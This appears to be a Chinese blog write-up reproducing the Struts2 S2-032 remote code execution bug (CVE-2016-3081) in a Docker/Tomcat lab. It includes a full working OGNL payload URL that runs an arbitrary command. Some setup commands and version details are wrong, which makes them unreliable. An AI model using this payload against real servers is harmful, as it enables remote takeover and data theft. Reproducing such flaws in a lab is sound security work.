漏洞的信息
CVE编号:CVE-2016-3081
漏洞名称:Struts2 S2 – 032远程代码执行
漏洞发布日期:2016.4.15
受影响的软件及系统:Struts2版本:Struts2 2.0.0 -2.3.28( 2.2.3(2.3.20.2和2.3.42.2不受影响)
漏洞概述
Apache Struts 2是世界上最流行的Java Web服务器框架之一。然而近日国内安全企业安恒信息的安全研究员Nike.zheng在Struts 2上发现存在高危安全漏洞(CVE-2016-3081,S02-32),黑客可以利用漏洞直接执行任意代码,绕过文件限制,上传文件,执行远程命令,控制服务器,直接盗取用户的所有资料,该漏洞广泛影响所有struts版本。
漏洞分析
此次漏洞存在于struts2的动态方法引用功能。只要在struts2配置文件中开启该功能,就可能被利用。
<constant name=”struts.enable.DynamicMethodInvocation” value=”true” />
如果我们请求http://localhost/index.action?method:OGNL的情况下,请求的OGNL表达式会被执行,造成命令执行。
想了解漏洞详细的分析,天融信阿尔法实验室
漏洞的利用
0x01 直接使用上次制好的镜像tomcat,生成容器:
docker run -it -d --name struts2-032 -p 8088:8080 tomcat
注意点就是Tomcat的默认端口为8080,因而端口要映射到8080。
image.png
当然如果没有容器,可以创建一个
命令是搜索可用的docker镜像
docker search apahce-tomcat
image.png
通过docker ps -a即可查看是否已启动
image.png
进入容器:
docker exec -t -i 00fb77cb413a /bin/bash
image.png
更新源:
apt-get install
image.png
安装jdk
先查看是否已安装jdk:
java -version
image.png
如图有安装,如果没有则接着直接安装默认jdk即可:
apt-get install default-jdk
接着查看并配置java环境变量:
image.png
确认已配置好。
安装tomcat
容器里面默认有tomcat安装包,我们就不需要从外面下载进来了,如果没有可以通过wget命令下载Tomcat的安装包
wget http://mirror.bit.edu.cn/apache/tomcat/tomcat-7/v7.0.79/bin/apache-tomcat-7.0.90.tar.gz
接着解压:
unzip apache-tomcat-7.0.90.tar.gz
开启Apache:
image.png
访问查看是否已开启:
可以通过curl命令本机查看一下:
image.png
当然直接到物理机的浏览器访问相应映射的端口访问也可以:
http://192.168.10.110:8088
image.png
若出现如上图则安装成功。
下载/struts/2.3.24
下载地址http://archive.apache.org/dist/struts/2.3.24/
百度云链接http://pan.baidu.com/s/1dFeUyNv
密码:279t
下载到本地,复制到虚拟机里面,然后cp到docker中
docker cp 本地的路径 容器ID : 容器里的路径
docker cp /home/ttf/struts-2.3.24 00fb77cb413a:/usr/local/tomcat/bin
image.png
然后将struts-2.3.24目录中apps目录内的struts2-showcase.war文件复制到Tomcat/webapps目录中的ROOT.war即可:
cp struts-2.3.24/apps/struts2-showcase.war /usr/local/tomcat/webapps/ROOT.war
image.png
接着重启Tomcat:
root@00fb77cb413a:/usr/local/tomcat/bin# ./shutdown.sh
root@00fb77cb413a:/usr/local/tomcat/bin# ./startup.sh
编写PoC验证:
?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=whoami
原网址
http://192.168.10.110:8088//struts2-showcase/home.action
现在网址
http://192.168.10.110:8088/struts2-showcase/home.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=whoami
image.png
只是手工验证了一下,还有其他的脚本或者批量的方式进行验证,遇到可以成功利用的脚本会贴到这里,待续~
网友评论